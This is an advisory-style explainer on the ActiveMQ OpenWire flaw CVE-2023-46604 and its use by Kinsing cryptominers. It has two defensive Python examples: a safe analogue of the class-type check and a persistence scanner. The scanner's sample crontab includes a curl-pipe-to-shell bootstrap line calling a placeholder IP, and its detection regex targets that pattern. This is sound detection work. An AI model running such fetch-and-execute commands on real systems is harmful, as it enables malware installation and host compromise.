CVE-2023-46604 has emerged as a critical vulnerability in Apache ActiveMQ, an open-source message-oriented middleware (MOM) developed by Apache. The vulnerability has been exploited by cybercriminals to carry out remote code execution (RCE) attacks, particularly against Linux systems, delivering the Kinsing malware and cryptocurrency miners.
- Vulnerability in OpenWire Protocol: CVE-2023-46604 arises from a flaw in the OpenWire command handling, which fails to validate throwable class types during unmarshalling. OpenWire is a binary protocol designed for efficiency in message-oriented middleware. Its binary format, which is the native wire format of ActiveMQ, optimizes bandwidth use and supports a wide array of message types.
- Remote Code Execution (RCE): This vulnerability enables attackers to execute arbitrary code on the server or application, creating serious security risk. The issue is so severe because it allows the instantiation and execution of any class available to the broker.
- Exploitation by Kinsing Malware: The Kinsing malware, a significant threat to Linux-based systems, exploits this vulnerability to infiltrate servers and spread across networks rapidly. It primarily gains entry through vulnerabilities in web applications or misconfigured container environments. Once inside, it deploys cryptocurrency-mining scripts that exploit the host’s resources, impacting system performance and infrastructure.
- Persistence and Rootkit Loading: Kinsing ensures its persistence on the affected host by adding a cron job that downloads and executes a malicious bootstrap script every minute. It then deepens the compromise by registering its rootkit in the /etc/ld.so.preload file, completing a full system compromise.
- Widespread Exploitation and Threat Actors: Since November, several reports have surfaced of threat actors actively exploiting CVE-2023-46604, aided by publicly available proof-of-concept exploits, including modules for tools such as Metasploit and Nuclei. The widespread exploitation by various threat actors makes this a significant security risk for organizations worldwide.
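The class-type check that the OpenWire bullet above describes, shown as an added Python analogue rather than ActiveMQ's own Java code: a throwable record on the wire carries a class name and a message, and the marshaller instantiates the named class with the message as its argument. The unchecked function reproduces the missing validation (any importable class gets instantiated), and the checked function adds the kind of "is this actually a throwable type?" guard that the fix introduced. Python's exception hierarchy stands in for Java's Throwable, and the wire records are constructed sample values, not captured traffic.

```python
"""Illustrative analogue (not ActiveMQ code) of unmarshalling a throwable record.

A throwable record is modelled as (class_name, message).  The vulnerable path
resolves the class name and instantiates whatever it finds; the hardened path
first confirms that the resolved class is an exception type.
"""
import importlib

# Constructed sample records, as a marshaller would decode them from the stream.
BENIGN_RECORD = ("builtins.ValueError", "bad argument")
# A class that is not a throwable.  It is harmless here, but the unchecked path
# would instantiate any importable class the stream names.
NON_THROWABLE_RECORD = ("collections.Counter", "abc")


def _resolve(class_name):
    """Import the module part of a dotted name and return the named attribute."""
    module_name, _, attr = class_name.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)


def is_throwable_class(cls):
    """True only for classes in the exception hierarchy (Python's Throwable)."""
    return isinstance(cls, type) and issubclass(cls, BaseException)


def create_throwable_unchecked(class_name, message):
    """Vulnerable pattern: instantiate whatever class the record names."""
    cls = _resolve(class_name)
    return cls(message)


def create_throwable_checked(class_name, message):
    """Hardened pattern: refuse any class that is not an exception type."""
    cls = _resolve(class_name)
    if not is_throwable_class(cls):
        raise TypeError(f"{class_name} is not a throwable type")
    return cls(message)


if __name__ == "__main__":
    print("unchecked, benign:", repr(create_throwable_unchecked(*BENIGN_RECORD)))
    print("unchecked, non-throwable:", repr(create_throwable_unchecked(*NON_THROWABLE_RECORD)))
    print("checked, benign:", repr(create_throwable_checked(*BENIGN_RECORD)))
    try:
        create_throwable_checked(*NON_THROWABLE_RECORD)
    except TypeError as exc:
        print("checked, non-throwable rejected:", exc)
```

The design point is that the guard runs on the resolved class before the constructor is called: a name-based denylist would be bypassable, whereas checking the type hierarchy limits instantiation to the one family of classes the record is supposed to carry.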
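A host-side check for the two persistence indicators named in the Kinsing bullet above, as an added example that is not part of the original post: it flags cron entries that run every minute and pipe a curl or wget download into a shell, and it lists whatever /etc/ld.so.preload loads, since on a healthy host that file is normally absent or empty. The crontab lines, the preload content and the 198.51.100.10 address are constructed sample data, not indicators from a real infection.

```python
"""Added example: scan for Kinsing-style persistence indicators.

Two checks, both fed constructed sample input so the script runs offline:
  1. cron entries scheduled every minute that download and execute a script;
  2. shared objects registered in /etc/ld.so.preload.
"""
import os
import re

# Constructed crontab: one legitimate job and one matching the bootstrap pattern.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL http://198.51.100.10/example-bootstrap.sh | sh
"""
# Constructed /etc/ld.so.preload content.
SAMPLE_PRELOAD = "/usr/local/lib/example-rootkit.so\n"

# Five asterisks: the job fires every minute.  The remainder is the command.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
# A downloader whose output is piped into sh or bash.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron_entries(crontab_text):
    """Return crontab lines that run every minute and fetch-and-execute a script."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = EVERY_MINUTE.match(line)
        if match and FETCH_AND_RUN.search(match.group(1)):
            hits.append(line)
    return hits


def preload_entries(preload_text):
    """Return the shared-object paths listed in an ld.so.preload file."""
    return [
        line.strip()
        for line in preload_text.splitlines()
        if line.strip() and not line.lstrip().startswith("#")
    ]


def _read_if_present(path):
    """Read a file's text, or return an empty string if it does not exist."""
    if os.path.isfile(path):
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    return ""


if __name__ == "__main__":
    print("sample cron hits:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("sample preload entries:", preload_entries(SAMPLE_PRELOAD))
    # Same checks against the live system files, where they exist and are readable.
    print("live /etc/crontab hits:", suspicious_cron_entries(_read_if_present("/etc/crontab")))
    print("live ld.so.preload entries:", preload_entries(_read_if_present("/etc/ld.so.preload")))
```

On a real host the per-user spool (/var/spool/cron) and /etc/cron.d also need to be read, which requires root; the functions take text, so they can be pointed at any of those files or at a collected copy during incident response.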